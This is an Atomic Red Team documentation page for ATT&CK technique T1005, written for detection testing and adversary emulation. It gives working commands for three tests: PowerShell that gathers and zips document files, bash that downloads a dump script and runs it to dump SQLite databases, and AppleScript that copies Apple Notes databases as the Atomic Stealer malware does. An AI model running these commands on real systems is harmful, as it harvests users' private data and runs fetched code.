Skip to content
Atomic Red Team
atomics
T1005

T1005 - Data from Local System

Description from ATT&CK (opens in a new tab)

Adversaries may search local system sources, such as file systems, configuration files, local databases, or virtual machine files, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a Command and Scripting Interpreter (opens in a new tab), such as cmd (opens in a new tab) as well as a Network Device CLI (opens in a new tab), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use Automated Collection (opens in a new tab) on the local system.

Atomic Tests


Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)

This test searches for files of certain extensions and saves them to a single zip file prior to extraction.

Supported Platforms: Windows

auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c

Inputs:

NameDescriptionTypeDefault Value
starting_directoryPath to starting directory for the searchPathC:\Users
output_zip_folder_pathPath to directory for saving the generated zip filePathPathToAtomicsFolder\..\ExternalPayloads\T1005
file_extensionsList of file extensions to be searched and zipped, separated by comma and spacestring.doc, .docx, .txt

Attack Commands: Run with powershell!

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "
 
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
 
Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}
 
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
 
  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

Cleanup Commands:

Remove-Item -Path  $outputZip\data.zip -Force


Atomic Test #2 - Find and dump sqlite databases (Linux)

An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.

Supported Platforms: Linux

auto_generated_guid: 00cbb875-7ae4-4cf1-b638-e543fd825300

Inputs:

NameDescriptionTypeDefault Value
remote_urlurl of remote payloadurlhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src (opens in a new tab)

Attack Commands: Run with bash!

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

Cleanup Commands:

rm -f $HOME/.art
rm -f $HOME/gta.db
rm -f $HOME/sqlite_dump.sh

Dependencies: Run with bash!

Description: Check if running on a Debian based machine.
Check Prereq Commands:
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
Get Prereq Commands:
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi


Atomic Test #3 - Copy Apple Notes database files using AppleScript

This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.

Supported Platforms: macOS

auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7

Inputs:

NameDescriptionTypeDefault Value
destination_pathSpecify the path to copy the database files into.path/private/tmp

Attack Commands: Run with sh!

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

Cleanup Commands:

rm "#{destination_path}/NoteStore.sqlite*"